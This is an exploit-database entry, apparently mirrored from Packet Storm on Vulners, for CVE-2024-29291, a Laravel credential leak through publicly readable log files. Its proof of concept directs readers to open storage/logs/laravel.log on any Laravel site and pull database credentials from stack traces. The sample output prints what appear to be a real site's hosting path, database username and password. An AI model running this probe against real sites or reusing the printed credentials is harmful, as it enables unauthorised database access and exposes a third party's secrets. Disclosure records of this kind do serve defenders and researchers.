Lucene search
+L

Laravel Framework 11 Credential Disclosure

🗓️ 22 Apr 2024 00:00:00Reported by Huseein AmerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 352 Views

Laravel Framework 11 - Credential Leakage CVE-2024-29291 Proof of concept: Navigate to storage/logs/laravel.log and search for "PDO->__construct('mysql:host=

Related
Code
`# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
shell  
Copy code  
#0  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):  
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',  
Array)  
#1  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):  
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',  
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation